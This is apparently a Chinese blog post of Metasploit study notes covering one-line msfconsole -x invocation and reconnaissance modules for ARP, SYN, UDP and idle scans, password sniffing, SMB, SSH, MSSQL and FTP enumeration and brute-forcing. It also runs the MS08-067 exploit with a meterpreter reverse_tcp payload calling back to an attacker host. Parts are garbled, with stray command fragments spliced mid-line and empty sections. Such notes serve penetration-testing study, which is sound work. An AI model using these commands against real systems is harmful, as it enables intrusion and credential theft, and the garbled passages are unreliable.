MSF学习(8)Msfcil (9)Msf信息收集

八:Msfcil(命令行界面,已被取消)

由msfconsole -x取代

编写脚本时便于引用

eg:(一行表示,更方便)

msfconsole -x “use exploit/windows/smb/ms08_067_netapi;set rhost 1.1.1.1; set payload windows/meterpreter/reverse_tcp;set lhost 1.1.1.8;set lport 5555;set target 34;exploit”

 

九:Msf信息收集

1:发现和端口扫描

(1)nmap扫描(与nmap一样)

msf5 > db_nmap -sV 192.168.1.0/24

 

(2)Auxiliary扫描模块

Arp扫描

msf5 > use auxiliary/scanner/discovery/arp_sweep

msf5 auxiliary(scanner/discovery/arp_sweep) > show options

msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.1.0/24(目标)

msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 20(线程)

msf5 auxiliary(scanner/discovery/arp_sweep) > set interface eth0

msf5 auxiliary(scanner/discovery/arp_sweep) > run(运行扫描)

 

 

Port端口扫描

msf5 > use auxiliary/scanner/portscan/+tab+tab

 

 

 

Eg:syn扫描

msf5 > use auxiliary/scanner/portscan/syn

msf5 auxiliary(scanner/portscan/syn) > show options

msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.1

msf5 auxiliary(scanner/portscan/syn) > set threads 50

msf5 auxiliary(scanner/portscan/syn) > run

 

2:idle扫描和udp扫描(第三方进行扫描)

(1)idle扫描

首先要先找到主机才能进行扫描

msf5 > use auxiliary/scanner/ip/ipidseq(找主机)

msf5 auxiliary(scanner/ip/ipidseq) > show options

msf5 auxiliary(scanner/ip/ipidseq) > set interface eth0

msf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.1.1-130

msf5 auxiliary(scanner/ip/ipidseq) > set threads 20

msf5 auxiliary(scanner/ip/ipidseq) > run

没有的话就不能使用

nmap -PN -sl +(递增的idle) +(扫描目标ip)

(2)udp扫描(两个模块)

msf5 auxiliary(scanner/ip/ipidseq) > use auxiliary/scanner/discovery/udp_sweep

msf5 auxiliary(scanner/discovery/udp_sweep) > show options

msf5 auxiliary(scanner/discovery/ud use auxiliary/scanner/rdp/ms12_020_check

p_sweep) > set rhosts 192.168.1.1-130

msf5 auxiliary(scanner/discovery/udp_sweep) > run

 

msf5 auxiliary(scanner/discovery/udp_sweep) > use auxiliary/scanner/discovery/udp_probe

msf5 auxiliary(scanner/discovery/udp_probe) > show options

msf5 auxiliary(scanner/discovery/udp_probe) > set rhosts 192.167.1.1-130

msf5 auxiliary(scanner/discovery/udp_probe) > run

3:密码嗅探和snmp扫描

(1)密码嗅探

msf5 > use auxiliary/sniffer/psnuffle

msf5 auxiliary(sniffer/psnuffle) > show options

msf5 auxiliary(sniffer/psnuffle) > set interface eth0

msf5 auxiliary(sniffer/psnuffle) > run(实时在线抓kali密码)

PS;支持pop3,imap,ftp,heep get协议

msf5 auxiliary(sniffer/psnuffle) > set pcapfile +(抓的包的内容文件路径)可以分析抓的包里面的帐号密码

msf5 auxiliary(sniffer/psnuffle) > jobs(查看当前模块的工作状态)

msf5 auxiliary(sniffer/psnuffle) > kill 0

 

(2)snmp扫描

密码爆破

用所得的权限爆破

own command: nessus_report_list.

当前用户

 

分享的文件

 

 

4:SMB服务扫描

(1)SMB版本扫描

msf5 > use auxiliary/scanner/smb/smb_version

msf5 auxiliary(scanner/smb/smb_version) > show options

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.7

msf5 auxiliary(scanner/smb/smb_version) > run

 

 

(2)扫描命名管道。判断SMB服务类型

use auxiliary/scanner/rdp/ms12_020_check

(3)(帐号密码)

msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor

msf5 auxiliary(scanner/smb/pipe_auditor) > show options

msf5 auxiliary(scanner/smb/pipe_auditor) > set rhost 192.168.1.7

mown command: nessus_report_list.sf5 auxiliary(scanner/smb/pipe_auditor) > run

 

 

知道帐号密码可以得到更多信息

(4)扫描通过smb管道可以访问的rcerpc服务

msf5 auxiliary(scanner/smb/pipe_auditor) > use auxiliary/scanner/smb/pipe_dcerpc_auditor

msf5 auxiliary(scanner/smb/pipe_dcerpc_auditor) > show options

msf5 auxiliary(scanner/smb/pipe_dcerpc_auditor) > set rhost 192.168.1

msf5 auxiliary(scanner/smb/pipe_dcerpc_auditor) > run

知道帐号密码可以得到更多信息

 

 

 use auxiliary/scanner/rdp/ms12_020_check

 

 

 

后面同理,不再说明

(5)smb共享枚举(需要帐号密码)

msf5 > use auxiliary/scanner/smb/smb_enumshares

(6)SMB用户枚举(需要帐号密码)

msf5 auxiliary(scanner/smb/smb_enumshares) > use auxiliary/scanner/smb/smb_enumusers

(7)SID枚举(需要帐号密码)

(8)msf5 auxiliary(scanner/smb/smb_enumusers) > use auxiliary/scanner/smb/smb_lookupsid

5:ssh扫描

(1)ssh版本扫描

msf5 > use auxiliary/scanner/ssh/ssh_version

msf5 auxiliary(scanner/ssh/ssh_version) > show options

msf5 auxiliary(scanner/ssh/ssh_version) > set rhost 192.168.1.7

msf5 auxiliary(scanner/ssh/ssh_version) > run

(2)Ssh密码爆破

msf5 > use auxiliary/scanner/ssh/ssh_login

msf5 auxiliary(scanner/ssh/ssh_login) > show options\

设置相关的参数即可

注意USER_AS_PASS 参数对应一个帐号一个密码这样的格式

(3)Ssh公钥登录

msf5 > use auxiliary/scanner/ssh/ssh_login_pubkey

 

6:补丁收集

基于已经取得的session进行检测(需要shell建立session)

msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > use post/windows/gather/enum_patches

msf5 post(windows/gather/enum_patches) > show options

msf5 post(windows/gather/enum_patches) > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > show options

msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.7

msf5 exploit(windows/smb/ms08_067_netapi) > set target 34

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms08_067_netapi) > show options

msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.1.10

msf5 exploit(windows/smb/ms08_067_netapi) > exploit

 

 

msf5 exploit(multi/handler) > exploit

 

有了session,即可

meterpreter > background(带sessions返回)

 

msf5 exploit(multi/handler) > exploit

报错,msf的一个bug,需要迁移session的进程,迁移以下就可以了

own command: nessus_report_list.

 

 

可以看到结果已经储到文件夹里了

 

7:sql sever

(1)mssql扫描端口

Tcp1433(动态端口)/udp1434(查询tcp端口号)

msf5 > use auxiliary/scanner/mssql/mssql_ping

msf5 auxiliary(scanner/mssql/mssql_ping) > show options

 

 

 

 

(2)爆破mssql密码

msf5 > use auxiliary/scanner/mssql/mssql_login

msf5 auxiliary(scanner/mssql/mssql_login) > show options

 

 

 

 

 

(3)远程执行代码(有数据库密码就可以执行操作系统命令)

msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_exec

msf5 auxiliary(admin/mssql/mssql_exec) > show options

 

 

 

 

8:FTP版本扫描

(1)版本信息扫描

msf5 > use auxiliary/scanner/ftp/ftp_version

msf5 auxiliary(scanner/ftp/ftp_version) > show options

(2)判断是否支持anonymous登录

msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous

msf5 auxiliary(scanner/ftp/anonymous) > show options

(3)密码爆破

msf5 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/ftp/ftp_login

msf5 auxiliary(scanner/ftp/ftp_login) > show options

 

 

 

 

9:信息收集模块

msf5 auxiliary(scanner/ftp/ftp_login) > use auxiliary/scanner/+tab+tab

 

posted @ 2020-05-22 11:16  adsry  阅读(487)  评论(0编辑  收藏  举报